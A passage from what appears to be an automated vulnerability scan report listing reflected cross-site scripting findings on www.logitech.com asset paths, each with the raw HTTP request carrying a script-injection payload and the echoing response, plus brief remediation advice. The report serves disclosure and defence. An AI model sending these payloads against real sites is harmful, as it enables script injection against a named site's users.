Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /de98c"><script>alert(1)</script>72a8646bc33/2062/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="de98c"><script>alert(1)</script>72a8646bc33/2062">
...[SNIP]...

1.34. http://www.logitech.com/assets/2062/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/2062/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a874e</script><script>alert(1)</script>62f02bb3036 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a874e</script><script>alert(1)</script>62f02bb3036/2062/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','a874e</script><script>alert(1)</script>62f02bb3036/2062' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.35. http://www.logitech.com/assets/20916/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/20916/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73cab"><script>alert(1)</script>30f517d160a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /73cab"><script>alert(1)</script>30f517d160a/20916/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="73cab"><script>alert(1)</script>30f517d160a/20916">
...[SNIP]...

1.36. http://www.logitech.com/assets/20916/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/20916/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a30c9</script><script>alert(1)</script>c31ef0f56d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a30c9</script><script>alert(1)</script>c31ef0f56d9/20916/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','a30c9</script><script>alert(1)</script>c31ef0f56d9/20916' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.37. http://www.logitech.com/assets/20917/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/20917/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b282d"><script>alert(1)</script>83dbf66b326 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /b282d"><script>alert(1)</script>83dbf66b326/20917/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="b282d"><script>alert(1)</script>83dbf66b326/20917">
...[SNIP]...

1.38. http://www.logitech.com/assets/20917/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/20917/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42995</script><script>alert(1)</script>cad82b14edf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /42995</script><script>alert(1)</script>cad82b14edf/20917/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','42995</script><script>alert(1)</script>cad82b14edf/20917' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.39. http://www.logitech.com/assets/20918/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/20918/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff247</script><script>alert(1)</script>b5bb4302480 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ff247</script><script>alert(1)</script>b5bb4302480/20918/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','ff247</script><script>alert(1)</script>b5bb4302480/20918' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.40. http://www.logitech.com/assets/20918/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/20918/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbd91"><script>alert(1)</script>ba13ba050da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /dbd91"><script>alert(1)</script>ba13ba050da/20918/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="dbd91"><script>alert(1)</script>ba13ba050da/20918">
...[SNIP]...

1.41. http://www.logitech.com/assets/20920/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/20920/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a2a4"><script>alert(1)</script>22fabc67789 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /2a2a4"><script>alert(1)</script>22fabc67789/20920/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="2a2a4"><script>alert(1)</script>22fabc67789/20920">
...[SNIP]...

1.42. http://www.logitech.com/assets/20920/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/20920/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89db0</script><script>alert(1)</script>56314fd7a9b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /89db0</script><script>alert(1)</script>56314fd7a9b/20920/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','89db0</script><script>alert(1)</script>56314fd7a9b/20920' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.43. http://www.logitech.com/assets/20921/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/20921/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fdd3"><script>alert(1)</script>d3629de7407 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /1fdd3"><script>alert(1)</script>d3629de7407/20921/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="1fdd3"><script>alert(1)</script>d3629de7407/20921">
...[SNIP]...

1.44. http://www.logitech.com/assets/20921/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/20921/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b9d0</script><script>alert(1)</script>b4c12caa80a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8b9d0</script><script>alert(1)</script>b4c12caa80a/20921/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','8b9d0</script><script>alert(1)</script>b4c12caa80a/20921' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.45. http://www.logitech.com/assets/22511/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/22511/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47b65"><script>alert(1)</script>31ffe28bf6d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /47b65"><script>alert(1)</script>31ffe28bf6d/22511/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="47b65"><script>alert(1)</script>31ffe28bf6d/22511">
...[SNIP]...

1.46. http://www.logitech.com/assets/22511/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/22511/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc283</script><script>alert(1)</script>3f96130449 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fc283</script><script>alert(1)</script>3f96130449/22511/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','fc283</script><script>alert(1)</script>3f96130449/22511' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.47. http://www.logitech.com/assets/26006/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/26006/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 485c2"><script>alert(1)</script>b1c196248bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /485c2"><script>alert(1)</script>b1c196248bf/26006/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="485c2"><script>alert(1)</script>b1c196248bf/26006">
...[SNIP]...

1.48. http://www.logitech.com/assets/26006/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/26006/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cec7a</script><script>alert(1)</script>4cd69b32f14 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cec7a</script><script>alert(1)</script>4cd69b32f14/26006/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','cec7a</script><script>alert(1)</script>4cd69b32f14/26006' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.49. http://www.logitech.com/assets/30594/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/30594/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bce8"><script>alert(1)</script>8c620fbcf6a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /2bce8"><script>alert(1)</script>8c620fbcf6a/30594/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="2bce8"><script>alert(1)</script>8c620fbcf6a/30594">
...[SNIP]...

1.50. http://www.logitech.com/assets/30594/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/30594/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4dba</script><script>alert(1)</script>a625bc8e1b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /f4dba</script><script>alert(1)</script>a625bc8e1b2/30594/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','f4dba</script><script>alert(1)</script>a625bc8e1b2/30594' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
